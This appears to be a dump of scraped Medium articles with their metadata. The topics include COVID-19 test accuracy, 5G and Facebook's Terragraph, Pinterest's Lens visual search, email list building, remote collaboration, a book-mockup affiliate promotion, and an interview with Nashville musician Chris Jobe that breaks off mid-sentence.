a patient’s nose could miss the virus if the patient is not showing many symptoms at the time of the test. Dr. Paul Pottinger, an infectious disease physician at UW Medical Centerm explains, “The one caveat like we talked about before, if you go in to get tested too early — for example if you have no symptoms at all — then the test may not work very well. It’s really designed and validated for people who are having symptoms of infection when they have the test.” According to Dr. Lee Harold Hilborne, a professor of pathology and laboratory medicine at UCLA, the high rate of false negatives may be due to improper sample collection rather than inaccurate analytical laboratory techniques. Hilborne elaborates, “The majority of issues contributing to error in diagnostic testing are pre-analytic. These occur during specimen order, collection, and transport, before the specimen ever reaches the lab. We know that collection methods do not always pick up the virus. Studies suggest current swab collection may have sensitivity in the range of 60 to 75 percent. That means the specimen submitted to the laboratory from a patient with the infection will not contain the virus roughly 25 to 40 percent of the time.” RT-PCR test kit to detect presence of 2019-nCoV in clinical specimens (Photo by tilialucida) To address the risks associated with false-negative test results, Dr. Sampathkumar and colleagues outlined four evidence-based recommendations: Continued strict adherence to physical distancing, hand-washing, surface disinfection, masking and other preventive measures, regardless of risk level, symptoms or COVID-19 test results, must be emphasized. Development of highly sensitive and specific tests, including improved RT-PCR tests and serological assays to detect antibodies, are needed to minimize the incidence of false-negative results and the risk of ongoing transmission based on a false sense of security. Risk levels should be assessed prior to testing. Negative test results should be interpreted with caution, especially for individuals in higher-risk groups, such as healthcare workers. Risk-stratified protocols must be put in place in order to properly interpret negative test results. These protocols should employ statistical data on diagnostics, transmission, and outcomes. “For truly low-risk individuals, negative test results may be sufficiently reassuring,” says Colin West, M.D., Ph.D., a Mayo Clinic physician and the study’s first author. “For higher-risk individuals, even those without symptoms, the risk of false-negative test results requires additional measures to protect against the spread of disease, such as extended self-isolation.” 2019-nCoV IgM/IgG antibodies diagnostic laboratory test (Image by science photo) What about blood tests to detect antibodies, the body’s response to the virus? These tests have limited utility from a diagnostic standpoint, as the body may not have had enough time to produce detectable antibodies in the early stages of infection, leading to false negative results. However, serological testing may be used to detect previous exposure, evaluate community spread, and assess antibody titers. But for now, testing results are fraught with uncertainty. While individuals who recover from viral infections usually emerge with some degree of immunity, it is not yet known to what extent and for how long immunity to COVID-19 may last. Researchers are still unclear as to whether the presence of antibodies necessarily confers immunity to the novel coronavirus. Higher levels of antibodies generally indicates the mounting of a stronger immune response, but the levels of antibodies needed for COVID-19 immunity has not yet been established. The reliability of antibody testing is another point of contention adding to the confusion. In Laredo, Texas, a purchase of 20,000 rapid COVID-19 tests was recently seized by the federal government after local health department officials discovered the tests were only accurate about 20 percent of the time. Generally, antibody tests that utilize a technique known as ELISA (enzyme-linked immunosorbent assay) tend to outperform point-of-care (POC) lateral flow tests in terms of both sensitivity and specificity.
https://medium.com/medical-myths-and-models/how-accurate-and-reliable-is-covid-19-testing-41cbc97c1d47
['Nita Jain']
2020-09-30 01:41:53.451000+00:00
['Health', 'Education', 'Science', 'Ideas', 'Covid 19']
Let’s normalize these acronyms for a better Medium
Twitter has acronyms and so does Instagram and Facebook, when people use fff-follow for follow or kfb-kindly follow back, and so on. Well, they’re lame but social media acronyms and slangs are never cool, still, they make things easier on social media. How about we try the same thing on Medium? I’ve seen lots of authors trying to reply to all responses, it’s usually “thanks for reading.” How about we change that to TFR/tfr! Lots of readers love responding to stories they loved and enjoyed reading. How about we type ILT/ilt/lt! for “I loved this/loved this” The point is, we could normalize acronyms on Medium and use them “when necessary.” Just a suggestion. What do you think?
https://medium.com/wreader/lets-normalize-these-slangs-for-a-better-medium-d0330f7a570a
['Winifred J. Akpobi']
2020-12-06 10:54:24.378000+00:00
['Short Form', 'Advice', 'Writing Tips', 'Creativity', 'Writing']
How Will Cities Pay for 5G? Ask Facebook.
Photo by Jack Sloop on Unsplash 5G is coming. 5G is the fifth generation of wireless networks. It’s significantly faster than current 4G networks, but the reason that 5G is important is not just so we can all watch Tiger King over and over on our phone or scroll endlessly through Facebook. It’s going to be essential to handle the massive increase in global mobile traffic that is expected in the next few years. Some estimates suggest that there will be over 5 times the mobile traffic in 2024 that there is today. 5G will be required to support that traffic. But there’s another reason that 5G will be important: it will enable cities to be able to become Smart Cities. What are smart cities? Smart Cities are basically cities that use technology to make planning and service delivery more efficient. The idea is that if you have a bunch of data about how resources are used or the behavior of people in the city, you can create a better functioning, safer city. For example, you can imagine a city that uses information about traffic and congestion to make traffic light wait times more efficient. Or, smart garbage disposal sites that send a signal when they are full, making disposal services more efficient. Information about water usage, electricity usage, and how people move throughout a city can also be used to inform policies and projects. Barcelona is already using this kind of technology to tell citizens where there are open parking spaces. Stockholm, Amsterdam, and Copenhagen, also each have smart city projects under development. At its core, smart cities rely on data to help make more effective administrative decisions. This data comes from sensors throughout a city that are connected over the Internet. Which brings us back to 5G: these types of large scale city design changes are possible, but only if they are supported by a suitably fast wireless network. The current networks would not be able to support these Smart City projects on a broad scale — but 5G networks could. Cities are therefore trying to build or facilitate the infrastructure needed for 5G networks, not only because they will be necessary to make those cities competitive, attract businesses, and give users the ability to download movies in seconds, but also because it is necessary to support a Smart City vision. If 5G is so important, why is it taking so long to get? Because it’s expensive. 5G networks are much faster than 4G, but the frequencies are also much higher — they’re between 24 and 72 GHz on a 5G network. What that means is that the signals don’t reach very far and they are easily blocked by trees, buildings, and other landscape features. To have the same kind of coverage that is possible with 4G networks, there would have to be many more cell towers. For cities and wireless companies, that means building a lot more infrastructure and laying way more fiber optic cable. And this is really expensive. Enter Facebook. Facebook seems to be expanding into every area of tech life (including getting into the cyber currency business), so it may not come as a surprise to you that they have also been working several projects to improve internet access. Their solution to the 5G infrastructure problem is a project called Terragraph. The solution they propose is to attach small cells to existing buildings and infrastructures that connect networks wirelessly. The small cells can be placed between existing cell towers. They act as intermediaries, connecting the cell towers to users, and extending the reach of those towers. Over long distances, this small cell wireless technology might not work very well. But as a “last mile” step between existing cell infrastructure and users, it’s able to deliver very fast service. And since the small cells can deliver data and connectivity from the cell towers to users wirelessly, they eliminate the need to lay more fiber optic cable, significantly cutting the cost of infrastructure. Facebook is not the only player in this game. At least a few other companies are also beginning to prototype similar “last mile” small cell technologies. This may be a good thing — while kind of infrastructure will be useful, there may be some legitimate privacy concerns about the company providing internet connectivity also having access to so much personal information about us through our online profiles. What does this all mean for us? 5G will be coming, one way or another. But with this new small cell technology, it may get to us a little quicker and with a much lower price tag attached. This is good news. Many Americans still don’t have access to broadband. The appearance of 5G will likely begin in the biggest cities, and may not be accessible to most Americans for many years. But the less expensive it is to build the infrastructure, the quicker people are likely to have access to it. Ultimately, 5G networks will mean much faster speeds and reduced latency for users who have access to it. For business, it may mean an improved ability to innovate. And for cities, it means the potential to begin to create smart systems that improve service systems.
https://medium.com/social-science/how-will-cities-pay-for-5g-ask-facebook-a97db6f7b786
['Ramsay Lewis']
2020-05-02 21:17:52.646000+00:00
['Technology', 'Cities', 'Science', 'Internet of Things', 'Future']
9 Popular GitHub Repos For Every Web Developer
Realworld The first repository in this list is Realworld. Its creators call it nothing less than “The Mother of all Demo Apps.” A bold statement, for sure, but I don’t think it’s an exaggeration. Realworld is an exemplary Medium.com clone (yes, the very platform you are probably surfing right now!). But not only that. The repository lets you choose between different front end and back end implementations, which you can happily mix. Vue.js + Node/Express or React /Redux + Rust? They got it! Realworld shows you how the exact same blog app is built on almost any popular language or framework. How awesome is that?
https://medium.com/better-programming/9-popular-github-repos-for-every-web-developer-6826582291bc
['Simon Holdorf']
2020-02-19 18:28:48.177000+00:00
['Technology', 'Programming', 'Productivity', 'Creativity', 'JavaScript']
Why Your Startup Isn’t Getting the Right Customers
Why Your Startup Isn’t Getting the Right Customers And what it takes to actually sell your “dream customers” Photo by krakenimages on Unsplash “I was sure our product would be perfect for them,” the founder fumed as she dropped into the chair on the other side of my desk. She was building software to help automate hospital billing services — a notoriously complex industry — and she was coming from a meeting where she’d pitched her software to the billing management team at the enormous hospital system associated with my university. To her, this seemed like a “dream customer,” and she couldn’t understand why they weren’t interested. “So the meeting didn’t go well?” I joked. She rolled her eyes, clearly not in the mood for my usual sarcasm. “It went terribly,” she moaned. “It felt like they were basically trying to push me out the door as quickly as they could. They had no interest in what I was pitching.” “Why was that?” I asked. Shew threw open her arms. “How the heck am I supposed to know? They didn’t tell me anything.” “It’s not their job to tell you,” I reminded her. “But it’s your job to figure it out. Since they didn’t react to your pitch the way you expected, what does that tell you?” “That I’m a failure,” she huffed. “Well, I suppose you did fail,” I replied. “But that doesn’t make you a failure. It’s only a failure if you can’t learn something. In this case, you actually have some valuable new data.” “But they didn’t tell me anything,” she said. “They weren’t remotely interested.” “That, right there!” I exclaimed, “That’s important data. You met with a company you thought was your dream customer and they had no interest in what you were selling. Shouldn’t that tell you something?” “I guess,” she said. “I mean… I guess it tells me I was wrong about who my dream customer should be.” “And you don’t think that’s important data?” I asked. “Yeah… I guess so,” she sighed. “I know so,” I said, feeling like I was trying to drag out an important lesson from my four-year-old daughter rather than a 20-something. “So what’s the next question you should be asking yourself?” She thought for a few moments, then shook her head in frustration. “I have no idea. Why was I such an idiot?” “That’s a good place to start,” I said. She raised her eyebrows, so I quickly explained further: “Not that I’m calling you an idiot. But you clearly misunderstood something about this particular customer’s business. That’s a big deal. In order to figure out how to target the right customers, you need to figure out what you’ve misunderstood.” “And how do I do that?” she asked. “Empathy,” I answered. “It’s one of the most important skills for an entrepreneur to develop. You have to be able to put yourself in the shoes of your prospective customers and attempt to see the world from their perspective.”
https://medium.com/swlh/why-your-startup-isnt-getting-the-right-customers-9f6972fb1e98
['Aaron Dinin']
2020-10-31 18:41:41.859000+00:00
['Work', 'Sales', 'Business', 'Startup', 'Entrepreneurship']
Charlotte — a New Technology Hub. Slalom Charlotte has now been around…
Slalom Charlotte has now been around for 1 year — traversing WeWork and our new home at the Railyard in Southend. We are about to have our launch party and I wanted to reflect on the last 6 months in Charlotte, post the last 7 years in San Francisco. It’s been a growth-fueled ride, with all the trappings you want to see in a market you’re invested in. I wanted to capture all the amazing things that have been happening but also set the stage on what we’re building: THE most impactful consulting firm in the Charlotte region. Folks that join our Charlotte market are going to grow to heights they didn’t think possible, and work on products and solutions that transform companies and industries here. I spent the last 7 years in San Francisco working with some of the most innovative companies on the planet. I’ve taken much of that learning to Charlotte, and I’m floored at the opportunity here. It’s an incredible time to be in Charlotte. It’s not only the abundance of BBQ or the myriad of breweries, but the passion and care the community has here. (There are a lot of breweries, wowza) It’s an environment that you can grow and flourish in. My family and I have now been out here for 6 months, it’s felt like a few days. I’m excited to share more on the great things happening in Charlotte and Slalom. So, what is happening in Charlotte? IT’S BANKING! Yes, and it’s actually more — it’s manufacturing, retail, healthcare, telecom, defense and also banking. :) I am amazed at the diversity of industry here, which allows for us to really stand by the statement of diversity of work for our consultants, designers and engineers. There is not just diversity of industry, but diversity of work — modern application design, development, machine learning, IoT, cloud native architecture and transformation across [insert favorite buzzword]. A myriad of companies have announced technology hubs and new centers in Charlotte over the last few months. Why you might ask? Talent to cross train, attractive wages, lower housing costs than major 5 cities, good weather, proximity to top university areas, mountains and beaches. Here’s what I’ve noticed coming from one of the technology epicenters — you can do interesting, challenging, dynamic work in the field and it doesn’t solely have to be the Bay Area. I imagine that’s obvious to folks in other regions, but oftentimes the Silicon Valley influence can steer the conversation on tech work. There is no longer a requirement to be on the coast for technology adoption and high wages. The proliferation of services across the cloud vendors, availability of open source experts and education has catapulted these supposed second cities into soon-to-be-powerhouses. Charlotte on the verge — it will be a 3 year journey I’ve spent a lot of time with technology and business leaders in Charlotte, across most industries, and I’ve learned that these leaders are starved for talent, adoption of new technologies, practices and evolution. Many of the companies here are getting underway with cloud technologies, but what is so attractive is that many are grabbing onto AI & ML use cases as a catalyst for adoption. That will result in both super interesting initial work, and some complex enterprise work to set foundational cloud architecture and services. If you are a data scientist, designer or engineer, I would strongly consider the curve here. As I alluded to earlier, there are numerous companies announcing technology hubs, a new presence or a relocation to Charlotte in the last 6–12 months. It’s encouraging, but also a sign of a soon to be challenging talent war. Not so dissimilar to what many large cities face today, but perhaps pointed given the nature of industry and frantic pace of new build outs. By nature of industry, I mean many of the financial and manufacturing firms have a tremendous opportunity to modernize — in service of attaining new customers, delighting those customers and creating compelling products. We are and will continue to train the uber talented folks coming from these firms to grow into world class technologists and leaders. An example of the tremendous growth in Charlotte is our Slalom office. I relocated mid March and we had roughly 20 employees — today we sit north of 110 employees… A Call Out for Technologists I have been asked a number of times from local leaders on my perception of the market, and while some of this is highlighted above, I always return with a question — who do you look up to in the technology space, who are your technology leader or leaders? I have been getting a lot of blank stares. Let’s change this, together. Let’s attract and develop those technology leaders of tomorrow in Charlotte. If you aren’t in Charlotte yet, now is the time. You’re going to have diversity of industry, diversity of projects, diversity of thought and be a part of the rocket ship. Similar to getting asked about the technology scene in Charlotte, I get asked quite a bit on “Why Slalom” and frankly spend a lot of timing talking with clients and recruits on “Why Slalom”. The rationale is fairly simple, we are a very different consulting firm than many — here you can advise and build, design and innovate, and be on the ground floor to transform our clients. It’s rare to be a part of a firm of our size and not be beholden to powerpoint decks. (As much I like a good set of slides.) The second and third reasons are that folks that join Slalom can have variety (you don’t get pigeon-holed), learn new technologies and patterns, and work with the some profound & passionate experts. Our ability and desire to blend management consulting with technology, in a local market model with global services, is simply different. Charlotte is a great place to live now and will continue to grow into a powerhouse. If any of this peaks your interest, I would love to chat. Originally posted on LinkedIn here.
https://medium.com/state-of-analytics/charlotte-a-new-technology-hub-50093c5befde
['Kyle Roemer']
2019-11-26 18:31:28.001000+00:00
['Charlotte', 'Analytics', 'Software Development', 'Startup', 'Cloud Computing']
Building Lens your Look: Unifying text and camera search
Eric Kim | Pinterest engineer, Visual Search In February we launched Lens to help Pinners find recipes, style inspiration and products using the camera in our app to search. Since then, our team has been working on new ways of integrating Lens into Pinterest to improve discovery in areas Pinners love most–particularly fashion–with visual search. What we’ve learned is some searches are better served with text, and others with images. But for certain types of searches, it’s best to have both. That’s why we built Lens your Look, as an outfit discovery system that seamlessly combines text and camera search to make Pinterest your personal stylist. Launching today, Lens your Look enables you to snap a photo of an item in your wardrobe and add it to your text search to see outfit ideas inspired by that item. It’s an application of multi-modal search, where we integrate both text search and camera search to give Pinners a more personalized search experience. We use large-scale, object-centered visual search to provide us with a finer-grained understanding of the visual contents of each Pin. Read on to learn how we built the systems powering Lens your Look! Architecture: Multi-modal search Lens Your Look is built using two of Pinterest’s core systems: text search and visual search. By combining text search and visual search into a unified architecture, we can power unique search experiences like Lens your Look. The unified search architecture consists of two stages: candidate generation and visual reranking. Candidate generation In the Lens your Look experience, when we detect the user has done a text search in the fashion category, we give them the option to also take a photo of an article of clothing using Lens. Armed with both a text query and an image query, we leverage Pinterest Search to generate a high-quality set of candidate Pins. On the text side, we harness the latest and greatest of our Search infrastructure to generate a set of Pins matching the user’s original text search query. For instance, if the user searched for “fall outfits,” Lens your Look finds candidate results from our corpus of outfit Pins for the fall season. We also use visual cues from the Lens photo to assist with candidate generation. Our visual query understanding layer outputs useful information about the photo, such as visual objects, salient colors, semantic category, stylistic attributes and other metadata. By combining these visual signals with Pinterest’s text search infrastructure, we’re able to generate a diverse set of candidate Pins for the visual reranker. Visual reranking Next, we visually rerank the candidate Pins with respect to the query image, such as the Pinner’s article of clothing. The goal is to ensure the top returned result Pins include clothing that closely match the query image. Lens Your Look makes use of our visual object detection system, which allows us to visually rerank based on objects in the image, such as specific articles of clothing, rather than across the entire image. Reranking by visual objects gives us a more nuanced view into the visual contents of each Pin, and is a major component that allows Lens your Look to succeed. For more details on the visual reranking system see our paper recently published at the WWW 2017 conference. Multi-task training: Teaching fashion to our visual models Now that we have object-based candidates, we assign a visual similarity score to each candidate. Although we’ve written about transfer learning methods in the past, we needed a more fine-grained representation for Lens your Look. Specifically, our visual embeddings have to model certain stylistic attributes, such as color, pattern, texture and material. This allows our visual reranking system to return results on a more fine-grained level. For instance, red-striped shirts will only be matched with other red-striped shirts, not with blue-striped shirts or red plaid shirts. To accomplish this, we augmented our deep convolutional classification networks to simultaneously train on multiple tasks while maintaining a shared embedding layer. In addition to the typical classification or metric learning loss, we also incorporate task-specific losses, such as predicting fashion attributes and color. This teaches the network to recognize that a striped red shirt shouldn’t be treated the same as a solid navy shirt. Our preliminary results show that incorporating multiple training losses leads to an overall improvement in visual retrieval performance, and we’re excited to continue pushing this frontier. Conclusion Since launching our first visual search product in 2015, the visual search team has developed our infrastructure to support a variety of new features, from powering image search in the Samsung Galaxy S8 to today’s launch of Lens your Look. With one of the largest and richly annotated image datasets around, we have an unending list of exciting ideas to expand and improve Pinterest visual search. If you’d like to help us build innovative visual search features, such as Lens Your Look, join us! Acknowledgements: Lens Your Look is a collaborative effort at Pinterest. We’d like to thank Yiming Jen, Kelei Xu, Cindy Zhang, Josh Beal, Andrew Zhai, Dmitry Kislyuk, Jeffrey Harris, Steven Ramkumar and Laksh Bhasin for the collaboration on this product, Trevor Darrell for his advisement and the rest of the visual search team.
https://medium.com/pinterest-engineering/building-lens-your-look-unifying-text-and-camera-search-1b2f3ef4e393
['Pinterest Engineering']
2017-11-15 17:12:49.549000+00:00
['Visual Search', 'AI', 'Computer Vision', 'Neural Networks', 'Deep Learning']
MockupShots: Create Your Own Professional Product Shots in Seconds
Writing and Publishing Tools I Use and Recommend MockupShots: Create Your Own Professional Product Shots in Seconds Launch your 2021 marketing efforts with brand new images of your book covers and other products Image created by Jacquelyn Lynn using MockupShots Creating attractive promotional images of your books and information products takes time, expertise, and money. Even though we have the talent and expertise in-house (thanks to the outstanding photography and design skills of Jerry D. Clement), we use MockUpShots to create shareable images of our books in a variety of settings. MockupShots provides more than 600 relevant images (seasonal, holiday, business, casual, with and without people, and more) that you can drop your book cover (or other packaging) into. In seconds, you can download the image to your computer to use any way you want. Image created by Jacquelyn Lynn using MockupShots It’s super easy to use: Just upload your book cover, browse through the mockups, and download the ones you want. Choose from stills, videos, and gifs. MockupShots includes tutorials that show you exactly what to do. Regular lifetime access to MockupShots is $198, but for a limited time, use the special link at the end of this article to get an awesome 60% discount. Pay just $80 for lifetime access to MockupShots for as many books as you want. Image created by Jacquelyn Lynn using MockupShots Use these images on your website, in your marketing materials, on social media — wherever you need professional images of your books in a variety of settings. New images are added regularly. Use MockupShots just once and you’ve more than recovered your investment by eliminating professional photography fees. Get lifetime access for just $80 — a 60% discount off the regular price of $198. Just use my special affiliate link. Go here for a complete list of the resources we use and recommend. This article was originally published on my site at CreateTeachInspire.com. You can reach me there or email me at [email protected]. You might also enjoy: Here’s a little more about me: Finally, here’s how to get a beautiful inspirational quote delivered to your inbox every Saturday:
https://medium.com/publishing-well/mockupshots-create-your-own-professional-product-shots-in-seconds-6ca003ecfb17
['Jacquelyn Lynn']
2020-12-24 01:35:24.742000+00:00
['Self Publishing', 'Business', 'Writing', 'Creativity', 'Photography']
5 Practical Ways to Build Your Email List Like a Smart Marketer
What’s the secret to a successful email campaign? Great design? Engaging subject lines and email copy? Your offer? It’s actually none of these things — while each, in itself, is important, the most crucial aspect of a successful email campaign is a quality email list. A quality email list is one you’ve built through connection with your audience, based on their registered interest, and ideally, segmented by each person’s preferences. So how can you build a great, effective e-mail list? How can you get more warm leads onto your database in order to target them with your future offers? Here are some tips. 1. Website/blog is the best place to take the first step Your website or blog is generally the first thing people visit — so leverage the power of your website and place an email sign-up form on it. When a visitor lands on your blog or site, give him/her a reason to subscribe — offer something valuable in exchange for their information. This could be an educational resource, eBook, white paper, special discount, free demo, or some other incentives. See how Blurb does this: 2. Use the power of content upgrade Brian Dean says that content upgrade increased his conversion rate from 0.54% to 4.82%. That’s 785%. Nathan Ellering, Content Marketing Lead at CoSchedule, shared his take here: “Content upgrade is an absolute best way to build an email list of active subscribers, just like how we’ve built a list of more than 100,000 subscribers at CoSchedule.” If you’re not using the power of content upgrade, you’re missing a great opportunity to build your email list. Create an informational and interesting article, and offer an actionable cheatsheet or quick guide as an upgrade. Add a line at the beginning, middle or end of the post which encourages visitors to download your cheat sheet or guide. Here’s a content upgrade example from Brian Dean: 3. Put a signup button on your Facebook Page Social media is a great medium through which to build an audience, and you can also use it to grow your email list. Add a ‘Sign up’ call to action button to your Facebook Page to collect email addresses — it’s a great way to convert your fans/followers into your subscribers. See how Birchbox does a great job by placing sign up button their Facebook page: 4. Hosting a Webinar Hosting a webinar can be a great way to communicate with your targeted audience — and collect email addresses. The best way to do this is to find trending topic relevant to your service, then conduct a webinar based on that subject. You can then ask potential attendees to provide their contact information in order to join the webinar — and don’t forget to promote it across the social media platforms. See how SEMrush adds a registration form to their Webinar page: 5. Run a Facebook Contest Facebook is also a great channel to run a contest or special offer (Instagram, too, can be beneficial on this front) Create a compelling graphic, engaging title and an irresistible giveaway, then ask your audience for their email address in order to join the contest. Take a look at London Drugs’ Facebook contest: Now that you have five simple, and proven, ways to build a quality email list, it’s time to implement them. Hopefully these tactics will help you to get a good amount of subscribers — start building your list today. Call To Action I’m creating an eBook: “Email Now: A Human Guide to Learn the Art of Email Marketing.” Do you want early access of it? Get on VIP List Here.
https://medium.com/the-mission/5-practical-ways-to-build-your-email-list-like-a-smart-marketer-2b6854ff09a7
['Pawan Kumar']
2018-07-05 15:47:57.973000+00:00
['Email Marketing', 'Marketing', 'Business', 'Digital Marketing', 'Startup']
Remote Collaboration for World Domination
Make great work with your team no matter where you are in the world. If you’re part of a large te­am or global company then you’re likely collaborating across time and geography every day. Maybe the developers­ on your team are in a different country, your design lead travels frequently or your client is in another city. Regardless of your role or locatio­n you could be reviewing specs, testing prototypes, pitching ideas, coordinating meetings, or delivering a workshop at any point in your day. These collaborative efforts between colleagues, stakeholders, and customers are key to the success of any project. When it comes to delivering these tasks remotely, however, individuals can become separated or ‘siloed’ because of poor communication, cultural differences, and time constraints. I’ve been working with internationally dispersed teams for some years now and I wanted to reassure you that working remotely shouldn’t be a barrier for you and your team to co-create successfully. In fact, remote work offers up lots of unique opportunities for both the individuals and the organizations that embrace it! Lots of companies advocate strongly for remote work. InVision and Automattic being two particularly good examples of this. And it makes perfect sense: allowing employees to work from anywhere in the world is not just good for recruitment but it’s a sure way to increase diversity in your organization. For startups or businesses that want to break into new markets, having a globally dispersed workforce is also a smart way to understand local trends and culture. There are many benefits to remote collaboration but there are also challenges and considerations. If you’re new to this way of working, managing a global team, or if you’re considering a transition abroad and hoping to hold your current role, these tips (tried and tested) may prove useful to you and your team along the way. 1. Start by building relationships. Good collaboration begins with trust. If you’re working alongside someone (even virtually) it’s important you get to know them. Make an effort to understand their strengths, weaknesses, personality, behaviours, and goals. Chatting about hobbies might sound unimportant in the context of business but when you’re not interacting with your teammates every other day over coffee or lunch, allowing time for this may be more beneficial than you think. People do their best work when they’re comfortable in their environment and trust their co-workers. So, get to know each other! Pro-tip: Carve out an afternoon for your team to share something that is interesting or personal to them. Maybe it’s a hobby or side hustle that reflects what they like to do outside of work. This will help you gain a deeper level of empathy and understanding for your team. Lightning talks or lunch n’ learns are fun platforms for these types of activities. (Although traditionally held in-person, you can simply use video conferencing software if your team is remote). 2. Have an agenda and set some goals. Time is precious. To get the best out of your remote session — whether it’s a call, a workshop, a review etc. — always have an agenda set in advance. Even a loose list of objectives will keep you on track and focused on what needs to get done. Above all, end your session with next steps or a to-do list to help clarify everyone’s responsibilities moving forward. I can’t stress how important this is when it comes to remote working. If you’re in a different time zone you may not have the opportunity to check in for another day or two (maybe longer), depending on schedules. Be sure that everyone is aligned and clear on their tasks and goals before the working day ends. 3. Tool up. There are so many great digital tools available — lots for free — that enable teams to brainstorm, plan, or workshop in real-time. It might take a little extra time to learn these tools but that investment up front will increase productivity, communication, and transparency in the long run. Some of my favourites: Slack Messaging platform for the workplace. Mural Virtual whiteboard. Perfect for design thinking activities and research synthesis. Trello Easy to use project management tool. Google Docs and Box File sharing in the cloud. InVision Digital product design platform with prototyping tools and helpful resources. Flow For tracking your tasks and projects. GitHub A dev platform that works for anyone. Track tasks, review code or manage projects. Prototypr A one-stop shop for discovering thousands of design resources and tools. 4. Put the phone down. Too often remote collaboration takes the form of a conference call. Unless the situation warrants an over-the-phone conversation then you should avoid dialling in blindly. Body language is a huge part of how we communicate and is far more effective and meaningful than the words we use alone. Using real-time video services like Zoom, WebEx or Skype will help break down some of the linguistic or cultural barriers that might exist across your team. Anyway, conference calls are notoriously unproductive… 5. Get off email. I recently read that email occupies approx. 23% of the average employee’s workday, and that average employee checks his or her email 36 times an hour. Ugh! So while email may have been radically disruptive some decades ago, it can be more troublesome than useful today. Initially intended for long form written exchanges, we often choose (or misuse) email for instant messaging and collaboration. My advice when it comes to email is, when possible, reduce your inbox by using it to share sensitive or important information only. Instead, choose tools like Slack to stay connected with your colleagues. Messaging platforms like this allow you to have ongoing, short and informal conversations in real-time and on the go.
https://medium.com/design-ibm/remote-collaboration-for-world-domination-e94b2ca724ef
['Lara Hanlon']
2018-07-11 14:38:50.523000+00:00
['Business', 'Collaboration', 'Remote Working', 'Productivity', 'Design']
Never Done Changing
Never Done Changing Amidst Nashville’s ever-growing community, pop singer/producer Chris Jobe is consistently moving forward. Chris Jobe, 3/30/18 @ The High Watt While leaning against a wall to keep myself from giving into the urge to nap, I find myself in awe of Chris Jobe’s never ending energy. About an hour after his performance on March 30th, he continues to make the rounds, enthusiastically greeting and thanking everyone still in the venue. Even as we sit down in the stairwell of the High Watt to begin our interview, he never stops moving. It seems natural for him to constantly be in motion — so natural that when I ask Chris to pose for a photo afterwards and he sits completely still, it’s jarring. While some people would see this constant energy as someone easily distracted, it becomes clear that he is a talented multi-tasker. We are interrupted several times by passing friends and fans, and when they’ve moved on, he goes right back to speaking where he left off, even when I’ve already forgotten the question. Chris Jobe, 3/30/18 @ The High Watt The 24 year old singer/songwriter/producer never thought he’d end up in Nashville. After applying to multiple schools in New York and Los Angeles and being daunted by the cost, he received a scholarship from Belmont University and, after learning about their music program, decided to give it a shot. He’s now been in Nashville for six years, happy with the community and the way he’s been able to grow as an artist. It’s clear that change and growth have been a constant for him over the years — and he doesn’t expect that to end anytime soon. “What sort of music do you create?” “Originally, it was going to be sarcastically happy pop stuff, and then it ended up being like more indie pop-type R&B.” “How long have you been writing and performing?” “I was 12 years old when I wrote my first song. My parents had just gotten a divorce and I was taking a poetry class…” he pauses, laughing. “I was a very deep twelve year old, all I listened to was Yellow by Coldplay, and lots of David Bowie and Jimmy Hendrix. That was my thing.” He then tells me about his first-ever performance as an 18 year old new to Nashville. It was at the Hard Rock Cafe, and was “terrible.” “Everything that could have gone wrong went wrong — and it was an ugly Christmas Sweater party, so I was wearing my ugliest sweater that you can imagine. I still hadn’t grown into my face yet, and I looked like a young, tall baby in a grandma’s Christmas sweater — and not doing well either.” image via Halfthestory, 10/16/17 @ The High Watt “Stuff like this is never going to be perfect, so performing is really just a matter of being there for people, being a conduit.” If the energy in the crowds that regularly show up at his shows are any indication, Chris Jobe has left that rough start far behind him. It’s taken a lot of work that continues to this day. “Honestly, I’m quite a perfectionist, and performing is not made for perfectionists. Leading up to a show, I always get so anxious. I try to go in there and capture the vibe of every song — but it’s weird to me because I feel like no matter what I do as a performer, it’s always different.” He states that his favorite part of performing is “stage banter” along with witnessing the crowd’s reactions from stage. He wants to be connected with the fans as much as he is with the music — but no matter what other people think, he’s going to follow his own instincts. “Stage,” the song he always opens his live sets with, “is kind of about my parents doubting me growing up. I think it’s an important message for kids — if you really want to do something, don’t whine about it, just do it. Just show your parents, hey, look what I can do.” The fact that now his parents have come around makes it a difficult song for him to continue to connect with, and he’s considering removing it from his set lists, even though it’s a crowd favorite. “Now my parents are very supportive because they’ve seen it all happening. So I’m not pissed at my parents anymore but… I dunno, it’s just this weird thing.” “I’m very competitive, and I know music is not a competition by any means, but I feel inspired and driven by my friends’ success — like this guy is fucking crushing it right now, I hope I can get to that level.” One of the things that is not in question is the viral success of his first single, Thank You Internet. “Thank You Internet is something we rewrote several times because the first time we wrote it, we wrote it as a complete joke, my buddy Kyle and I.” He then sings the original bridge while we sit in the stairwell, sending some passing fans and myself into fits of laughter. “Dog and cat videos, yeah! All that shit can stay. But Kim Kardashian and her fake ass — that shit is lame!” Recovering, I ask him about the production of the video, which seemed extremely large scale for an indie artist. “It took about two or three weeks of planning. I have a bunch of talented friends who came together, and it was one of those things where everything fell into place kind of by luck.” A friend of his who has produced successful music videos in the past helped him with permits for filming locations, and keeping Chris’ “overly ambitious ideas” reined in. One of these ambitious ideas was to reach out to different apps and ask them to help with the animation. “We sent it to Tinder and Bumble and Uber, like hey I want to put you in my video, and the ones who responded listened to the song and were like ‘aren’t you dissing us, why would we pay you or give you a sponsorship?’” He also reached out to an animation company in Indiana that was luckily willing to work with him on a “nearly non-existent budget.” Everything, from the usernames in the video to the locations to the time stamps are extremely intentional. With the combination of catchy, relatable lyrics and excellent animation, once the video was completed, they did get one major social media outlet on board. “Once we had the video all put together, we sent it to Facebook and they were like ‘we love this, we want you to be artist of the day.’ We thought it was crazy, but they released it and we got to watch it grow organically. It’s been amazing.” At the time of this article being published on April 17, 2018, the original post of Thank You Internet on Music on Facebook has had 981,890 views — at the time of the interview on April 1st, it had 846K. “I feel like I have a lot of friends who had a song that’s popped off, and for me to have this video, and having so many people show up on Facebook — which I hadn’t really used because I’m such an Instagram guy — that was a really cool experience.” image via Chris Jobe “I’m not focused on getting a label, I’m just focused on getting to a place where I’m super proud of everything I’m doing, so I can give that over to the fans without anxiety. I feel like I’m on the right track.” Shortly after TYI, he released his second single, Love In The Morning. Both are crowd pleasers at his live shows, but he feels more comfortable with the latter. “It’s fun and I like what TYI is about, but stylistically it’s different compared to the other songs that I sing where I’m like, ‘hey this is a piece of my soul, here you go.’” He currently has the release of two more singles planned, and is excited to see how his fans receive them. While creating music may take up the majority of his time, Chris does attempt to make it to his friends shows, and make time for other interests. One of his favorite books is The War of Art by Steven Pressfield, which he recommends to all creative people. He enjoyed the movie Ladybird, and hopes Timothée Chalamet — “the guy that was in Ladybird with the french name, on the cover 